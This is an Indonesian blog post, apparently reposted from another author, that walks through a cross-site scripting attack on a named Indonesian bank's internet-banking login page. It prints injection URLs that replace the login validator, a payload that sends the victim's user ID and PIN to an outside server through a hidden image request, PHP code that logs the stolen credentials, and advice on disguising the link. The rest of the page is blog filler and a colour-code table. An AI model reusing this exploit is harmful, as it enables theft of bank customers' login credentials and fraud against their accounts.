Latest Post
Loading...
ExpertAdvisorku.blogspot.com adalah situs pembelajaran bahasa pemograman yang memahami setiap fungsi bahasa perintah dan menterjemahkan bahasa manusia kebahasa mesin selamat datang disitus ini dan mohon maaf jika dalam penulisan ada yang salah atau ada kata yang membuat pengunjung kurang nyaman
Sunday, 5 July 2015
Menjaring Password  KlikBCA dengan XSS

expertadvisor.blogspot.com akan memberikan contoh exploit yang cukup berbahaya

Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.

Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang  tidak  secara  langsung,  namun  ingat  satu  bug  bisa  di-exploit  dengan  1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.

The Vulnerability


xss bug

Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.

URL ketika password kita salah adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)

URL tersebut akan menghasilkan source html sebagai berikut:

<script>
var err='User ID harus Alpha Numerik/User ID must be Alpha Numeric'
alert(err); iBankForm.action='login.jsp'; iBankForm.submit();
</script>

Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:
https://ibank.klikbca.com/authentication.do?value(actions)=logout&value
(strError)=TEST';alert(document.cookie);<!--

URL di atas menghasilkan source html berikut:

1 <script type="text/javascript">
2    var err='TEST';alert(document.cookie);<!--'
3    alert(err);
4   iBankForm.action='login.jsp';
5   iBankForm.submit();
6  </script>
Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini :



Strategy and Tactics

Strategi  yang  di pakai  untuk  mendapatkan  username  dan  password  sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu maka menggunakan taktik berikut:
1.   Meng-intercept klik tombol submit
2.   Mengirimkan user dan password ke server saya
3.   Mencatat user dan password di server saya
Intercepting Submit Button

Maka akan menemukan kendala dalam mengintercept submit  button. Kalau kita lihat  pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.

1 <input type="Submit" value="LOGIN" name="value(Submit)"
2 onclick="javascript:return Login_Form_Validator(document.frmParam)"
3 onmouseover="this.style.cursor='hand'" />

Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.

var blnSubmitted = false;
function Login_Form_Validator( theForm ) {

document.forms[0]['value(user_id)'].autocomplete = 'off';
document.forms[0]['value(pswd)'].autocomplete = 'off';

var blnResponse = false;
if (blnSubmitted) {
return false;
}
var strErrMsg = "";
if( document.forms[0]['value(user_id)'].value == '') { alert("Silakan mengisi User ID anda/Please input your User ID"); document.forms[0]['value(user_id)'].focus();
return false;
}
if( document.forms[0]['value(user_id)'].value.length>12) {
alert("User ID/Password Anda salah / Your User ID/Password is
Wrong");
document.forms[0]['value(user_id)'].select();
document.forms[0]['value(user_id)'].focus();
return false;
}

if(document.forms[0]['value(pswd)'].value == '') { alert("Silakan mengisi PIN anda/Please input your PIN"); document.forms[0]['value(pswd)'].focus();
return false;
}
if(document.forms[0]['value(pswd)'].value.length<6) {
alert("PIN harus 6 Angka/PIN must be 6 digits");
document.forms[0]['value(pswd)'].focus();
return false;
}

//if(strErrMsg != '') {
//  alert(strErrMsg);
//  return false;
//}

//blnSubmitted =  confirm("Click OK to login.");
if ( !blnSubmitted ) {
blnSubmitted = true;
blnResponse = true;
}
//if('< %= blnLogout %>'=='true')
//blnResponse = false;

return blnResponse;

}
Bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.

Setelah memperhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian  buat  browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag <noscript> dan tag awal komentar <! agar javascript pada baris sesudahnya diabaikan browser.

Jadi URL untuk menjalankan taktik di atas adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value( strError)=TEST';function Login_Form_Validator(theForm){alert('TEST');return false;}</script><noscript><!--

URL tersebut menghasilkan source html berikut:
<script>
var   err='TEST';function
Login_Form_Validator(theForm){alert('TEST');return
false;}</script><noscript><!--'
alert(err); iBankForm.action='login.jsp'; iBankForm.submit();
</script>



function overridden

Untuk menguji versi Login_Form_Validator manakah yang dipakai, klik tombol LOGIN tanpa  mengisi  username  dan  password.  Ternyata  yang  muncul  adalah  dialog  box “TEST”. Itu berarti fungsi yang berlaku adalah versi saya, HORE! Kalau versi aslinya, muncul peringatan bahwa user dan password harus diisi. Oke taktik pertama sukses. Mari kita Lanjut ke taktik ke-2.

Sending username and password

Oke, sekarang ketika user  mengklik  submit, code kita akan di-eksekusi. Now what? Selanjutnya tentu saja kita harus membuat code untuk mengirimkan user dan password pada saat user mengklik tombol submit. Untuk bisa mengirimkan data, berarti kita harus membuat browser melakukan request ke server saya. Saya menggunakan image untuk tujuan itu. Lho kok image? Iya karena ketika browser menemukan tag image, saat itu

juga browser akan melakukan request GET ke server tempat image itu berada sesuai isi atribut SRC. Namun hal yang lebih penting lagi adalah, bila kita ubah atribut src dari object image dengan javascript, maka browser akan mengirimkan request GET sekali lagi. Request ini yang lebih penting, bukan request GET image pertama ketika halaman diload.

Saya definisikan tag image dengan dimensi 1×1 agar invisible, dengan nama myimage sebagai berikut:

<img src="http://expertadvisorku.blogspot.com/testcapture.php" name="myimage" width="1" height="1">

Sedangkan variabel yang berisi username dan password adalah:

document.forms[0]['value(user_id)'].value document.forms[0]['value(pswd)'].value

Agar bisa mengirimkan user dan password, saya harus mengubah atribut src myimage menjadi:

'http://expertadvisorku.blogspot.com/testcapture.php?userid='+document.forms[0][
'value(user_id)'].value+'&passwd='+document.forms[0]['value(pswd)'].val
ue

Selanjutnya saya harus membuat  fungsi Login_Form_Validator mengubah atribut  src myimage, agar ketika submit button di-klik maka atribut src myimage akan berubah dan browser akan melakukan request GET ke isi atribut src. Hal yang tricky adalah jika return dari fungsi Login_Form_Validator adalah false, browser baru akan melakukan request image. Bila tidak, browser akan mengabaikan perubahan atribut src, dan tetap melakukan submit.

Untuk menyiasatinya, saya terpaksa membuat agar button submit harus di klik 2x. Pada klik yang pertama tidak terjadi submit sesungguhnya, hal ini saya manfaatkan untuk mengubah atribut src myimage dan mengirim username/password ke server saya. Pada klik ke-2, browser baru melakukan submit yang sesungguhnya. Agak aneh memang, tapi saya yakin kebanyakan user tidak akan menyadari dan akan melanjutkan dengan meng- klik sekali lagi.

Saya buat satu variabel abc yang bernilai false pertama kali. Pada klik pertama, nilai abc menjadi true, sehingga pada klik ke-2 fungsi tidak mengembalikan nilai false. Fungsi Login_Form_Validator adalah sebagai berikut:
var abc=false;
function Login_Form_Validator(theForm {
if (!abc) {
document.images.myimage.src='http://
expertadvisorku.blogspot.com/testcapture.php
'+'?userid='+document.forms[0]['value(user_id)'].value+'&passwd='+docum
ent.forms[0]['value(pswd)'].value;
abc = true;
return false;
}
}
Kini  sudah  lengkap  semua  yang  dibutuhkan,  siap  untuk  diinjeksikan  melalui  URL sebagai berikut:
https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';var abc=false;function Login_Form_Validator(theForm){if (!abc)
{abc=true;document.images.myimage.src='http://
expertadvisorku.blogspot.com/testcapture.php?userid='%2Bdocument.forms[0]['value(user_id)'].value%2B'%26p
asswd='%2Bdocument.forms[0]['value(pswd)'].value;return
false;}}</script><img name="myimage" src="http://www.ilmuhacking.com/testcapture.php" width="1" height="1"><noscript><!--

URL di atas adalah EXPLOIT. Tugas attacker adalah membuat orang lain yang ingin login, meng-klik melalui link tersebut. Ada banyak cara untuk itu. Salah satunya adalah dengan     membuat     link     dengan     anchor     text     di     samarkan,     seperti     ini:

Klik di sini untuk login.

Bila  kita  coba  isi  dengan  username:abc1234  dan password:123456.  Maka  pada  klik pertama akan ada request GET ke URL berikut ini:

http://expertadvisorku.blogspot.com/testcapture.php?userid=abc1234&passwd=123456

Baru pada klik ke-2, username dan password tersebut di-submit dengan request POST ke server yang benar.

Saving User and Password

Sekarang bagian yang paling mudah, yaitu menyimpan username dan password yang masuk. Dalam contoh ini menggunakan URL www.expertadvisorku.blogspot.com/testcapture.php

maka kita menyimpan user dan password dalam file capture.txt. Kode PHP yang digunakan untuk menyimpan user dan password adalah sebagai berikut:

1 <?php
2 $file=fopen("capture.txt","a+");
3 $userid=$_GET["userid"];
4 $passwd=$_GET["passwd"];
5 $ipaddr=$_SERVER["REMOTE_ADDR"];
6 $now = date("Ymd H:i:s");
7 if (!empty($userid)) {
8         fwrite($file,"$userid  =&amp;gt;  $passwd  (at  $now  from
9 $ipaddr)\n");
10 }
11 fclose($file);
?>

Kesimpulan dalam hal ini adalah : Bahwa pengetahuan ini  untuk  meningkatkan  kemampuan  dalam keamanan Jaringan.
Ternyata  bug  yang  di-remehkan  seperti  XSS  sekalipun,  bila  di-exploit  bisa  jadi berbahaya. dalam hal ini telah buktikan dengan contoh sederhana ini. Di tangan orang yang tepat celah sekecil apapun bisa menjadi masalah besar. Maka yang pelu diperhatikan adalah: Never  Underestimate Vulnerabilities

Penggunaan enkripsi https sama sekali tidak berguna dalam kasus ini. Karena https hanya menjamin authentication dan confidentiality saja.

NB : Expertadvisorku.blogspot.com sudah diganti yang asalnya adalah www.ilmuhacking.com By Rizki Wicaksono

Dapatkan Dollar Disini

[WHAFF] Programmer Antiviruss Hantam Tools WHAFF sudah mengundang Anda ke WHAFF Imbalan! Download WHAFF Imbalan, masukkan kode undangan : [ CG64563 ] dan dapatkan $0,30!!! DAFTAR DISINI

Daftar Seacrh Engines

Suara Hati Programmer

Wahai Para Wanita jika engkau ingin mencari suami yang tidak keluar rumah maka jatuhkanlah pilihanmu kepada seorang programmer setelah engkau mengetahui agamanya demikianlah himbauan ini dibuat agar dapat digunakan sebagaimana mestinya

App Iphone & Smartphone

Markaz Buku

Jasa Acara Pernikahan

Daftar Blog Keilmuan

Beli Domain Hosting Disini

Iyan Goodman. Powered by Blogger.

Dapatkan Buku ini

Dapatkan Buku ini
Buku Mahir Menganalisa Pergerakan harga dan Membuat EA tanpa guru

Follow Me

Popular Posts

Kode Warna HTML

#7FFF00
Chartreuse
#D2691E
Chocolate
#FF7F50
Coral
#64950
Cornflowerblue
#FFF8DC
Cornsilk
#DC143C
Crimson
#00FFFF
Cyan
#00008B
Darkblue
#008B8B
Darkcyan
#B8860B
Darkgoldenrod
#A9A9A9
Darkgray
#006400
Darkgreen
#8B008B
Darkmagenta
#BDB76B
Darkkhaki
#556B2F
Darkolivegreen
#FF8C00
Darkorange
#9932CC
Darkorchid
#8B0000
Darkred
#E9967A
Darksalmon
#8FBC8B
Darkseagreen
#483D8B
Darkslateblue
#2F4F4F
Darkslategray
#00CED1
Darkturquoise
#9400D3
Darkviolet
#FF1493
Deeppink
#00BFFF
Deepskyblue
#696969
Dimgray
#1E90FF
Dodgerblue
#B22222
Firebrick
#FFFAF0
Floralwhite
#228B22
Forestgreen
#FF00FF
Fuchsia
#DCDCDC
Gainsboro
#F8F8FF
Ghostwhite
#FFD700
Gold
#DAA520
Goldenrod
#808080
Gray
#008000
Green
#ADFF2F
Greenyellow
#F0FFF0
Honeydew
#FF69B4
Hotpink
#CD5C5C
Indianred
#4B0082
Indigo
#FFFFF0
Ivory
#F0E68C
Khaki
#E6E6FA
Lavender
#FFF0F5
Lavenderblush
#7CFC00
Lawngreen
#FFFACD
Lemonchiffon
#ADE8E6
Lightblue
#F08080
Lightcoral
#E0FFFF
Lightcyan
#FAFAD2
Lightgoldenrodyellow
#90EE90
Lightgreen
#D3D3D3
Lightgray
#FFB6C1
Lightpink
#FFA072
Lightsalmon
#20B2AA
Lightseagreen
#87CEFA
Lightskyblue
#778899
Lightslategray
#B0C4DE
Lightsteelblue
#FFFFE0
Lightyellow
#00FF00
Lime
#32CD32
Limegreen
#FAF0E6
Linen
#FF00FF
Magenta
#800000
Maroon
#66CDAA
Mediumaquamarine
#0000CD
Mediumblue
#BA55D3
Mediumorchid
#9370DB
Mediumpurple
#3CB371
Mediumseagreen
#7B68EE
Mediumslateblue
#00FA9A
Mediumspringgreen
#48D1CC
Mediumturquoise
#C71585
Mediumvioletred
#191970
Midnightblue
#F5FFFA
Mintcream
#FFE4E1
Mistyrose
#FFE4E1
Moccasin
#FFDEAD
Navajowhite
#000080
Navy
#FDF5E6
Oldlace
#808000
Olive
#6B8E23
Olivedrab
#FFA500
Orange
#FF100%0
Orangered
#DA70D6
Orchid
#EEE8AA
Palegoldenrod
#98FB98
Palgreen
#AFEEEE
Paleturquoise
#DB7093
Palevioletred
#FFEFD5
Papayawhip
#FFDAB9
Peachpuff
#CD853F
Peru
#FFC0CB
Pink
#DDA0DD
Plum
#B0E0E6
Powderblue
#800080
Purple
#FF0000
Red
#BC8F8F
Rosybrown
#4169E1
Royalblue
#8B4513
Saddlebrown
#FA8072
Salmon
#F4A460
Sandybrown
#2E8B57
Seagreen
#FFF5EE
Seashell
#A0522D
Sienna
#C0C0C0
Silver
#87CEEB
Skyblue
#708090
Slategray
#FFFAFA
Snow
#00FF7F
Springgreen
#4682B4
Steelblue
#D2B48C
Tan
#008080
Teal
#D8BFD8
Thistle
#FF6347
Tomato
#40E0D0
Turquoise
#EE82EE
Violet
#F5DEB3
Wheat
#FFFFFF
White
#F5F5F5
Whitesmoke
#FFFF00
Yellow
#9ACD32
Yellowgreen

Support Chat